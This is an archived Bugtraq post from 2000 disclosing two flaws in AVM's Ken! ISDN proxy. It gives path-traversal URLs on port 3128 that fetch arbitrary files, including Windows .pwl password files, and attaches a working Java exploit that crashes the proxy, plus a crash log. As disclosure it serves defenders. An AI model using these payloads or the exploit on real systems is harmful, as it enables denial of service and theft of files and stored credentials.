Bugtraq mailing list archives
(no subject)
From: eax () MAD SCIENTIST COM (eAX [Teelicht])
Date: Sat, 15 Apr 2000 09:26:53 -0400
Hi Bugtraq people, This is a a copy of the mail I send to AVM about the Securtity Bugs in Ken! ISDN Proxy Software. eAX --------------------------------------------------------------- Dear AVM Team, I found two serious (security) bugs in your internet/isdn proxy software AVM Ken!, and I think I should inform you first about it. While testing some things on a friends system, which is running Ken! ,I noticed that I can crash Ken! remotly and force it to cut off all connections, using a simple Telnet connection. I also found a way to downlaod ANY file from the Ken! Server. When I say ANY file I mean ANY file! The Denial of Service attack (crash): I scanned the system for open ports and noticed that port 3128 was opened by Ken!. I connected to it via a telnet client and sended some trash (until now just intrested in the HTTP error message), but then I noticed that Ken! crashs with a pagefault, closes all connections and restarts. I retested this with a Windows 98 and a Windows 2000 machine, both Ken!'s crashed. (Tested with Ken! 1.03.10 (german)) The download everything bug (dangerous!!): While looking for more bugs, I found out this: type in your webbrowser: http://targethost:3128/../../../../../autoexec.bat or http://localhost:3128/../../../../../windows/any_pwl_you_want.pwl If Ken! is located in the C:/Programme/Ken!/ or C:/Program Files/Ken! , this will cause ken to send you the autoexec.bat, or any file you want (just change the url). I already cracked a test server to check how dangerous this security hole is, and I found out that it is extremly dangerous for servers with important files or remote acess (Windows 2000 telnetd), because the person who set it up for me, installed Ken! in the default directory. Imagine what would happen if someone would steal a important database from a server running Ken! The best thing to prevent misuse is to install Ken! into a diffrent directory until the bug is fixed (If Ken! isn't located in one of these directorys, you can find the directory by testing the path until you find autoexec.bat, but this is hard.). Retested on a LAN and the Internet, with a Windows 98 and a Windows 2000 Server. (Tested with Ken! 1.03.10 (german)) Your eAX (17 years old) P.S.Attached to this message is a EXPLOIT CODE written in Java, what can be used on any OS. I also attached a part of the log file from Ken!. P.SS. Maybe, I will post this to a security mailing list and rootshell in a few days. I say a few days, cause I think you should have time to fix the bugs, if you haven't done this already. P.SSS. Better luck next time :) P.SSSS. Fritz Card is really cool! ----Exploit Code------ import java.net.Socket; import java.io.*; /* BARBIE - The AVM KEN! exploit This exploit causes a crash in the AVM KEN! ISDN Proxy software. All conections will be cut off, but the server will restart again, a few seconds later. Tested with AVM KEN! Version 1.03.10 (german) */ class barbie { String adress; public void killken() { PrintWriter out = null; try{ Socket connection = new Socket( adress, 3128); System.out.println(""); System.out.println("killing..."); out = new PrintWriter(connection.getOutputStream(), true); out.println("Whooopppss_Ken_died"); connection.close(); } catch (IOException e) { System.out.println(""); System.out.println(" Can't met Ken! "); } } public static void main (String arguments[]) { barbie kk = new barbie(); if(arguments.length < 1) { System.out.println(""); System.out.println("usage: java barbie <adress/ip>"); System.exit(1); } kk.adress = arguments[0]; kk.killken(); } } ---------------------- ------Log file-------- 2000-04-12 20:36:40 keninet: CheckLimits charge(0,50000) time(0,180000) -->0 ACTIVE=TRUE): t1=0 t2=955564600 2000-04-12 20:40:14 kenserv: Process #6c is DOWN, Code=-1073741819 2000-04-12 20:40:14 kenserv: Process KENPROXY.EXE TERMINATED witout UNREGISTER_MSG (CRASH), Restarting immed 2000-04-12 20:40:14 kenserv: ----- Task PROXY(4) STOPPED, restart:1 immed.----- 2000-04-12 20:40:14 kenserv: DUMP: bShutdown=0 2000-04-12 20:40:14 kenserv: TASK CAPI state=0 hProc=0x0 tRest=0 bDelayedSt=0 nStopRetry=0 bStopFailed=0 2000-04-12 20:40:14 kenserv: TASK INET state=2 hProc=0x78 tRest=0 bDelayedSt=0 nStopRetry=0 bStopFailed=0 2000-04-12 20:40:14 kenserv: TASK PROXY state=0 hProc=0x0 tRest=1 bDelayedSt=0 nStopRetry=0 bStopFailed=0 2000-04-12 20:40:14 kenserv: TASK MAIL state=0 hProc=0x0 tRest=0 bDelayedSt=0 nStopRetry=0 bStopFailed=0 2000-04-12 20:40:14 kenserv: TASK DHCP state=0 hProc=0x0 tRest=0 bDelayedSt=0 nStopRetry=0 bStopFailed=0 2000-04-12 20:40:14 kenserv: TASK DNS state=0 hProc=0x0 tRest=0 bDelayedSt=0 nStopRetry=0 bStopFailed=0 2000-04-12 20:40:14 kenserv: TASK SOCKS state=2 hProc=0x5c tRest=0 bDelayedSt=0 nStopRetry=0 bStopFailed=0 2000-04-12 20:40:14 kenserv: TASK MAP state=2 hProc=0x74 tRest=0 bDelayedSt=0 nStopRetry=0 bStopFailed=0 2000-04-12 20:40:14 kenserv: Executing (KENPROXY.EXE) - OK ---------------------- ______________________________________________ FREE Personalized Email at Mail.com Sign up at http://www.mail.com/?sr=signup
Current thread:
- (no subject) eAX [Teelicht] (Apr 15)
- Re: KEN! security hole (was: -no subject-) Thorsten Claus (Apr 17)
- bugs in Panda Security 3.0 |Zan (Apr 17)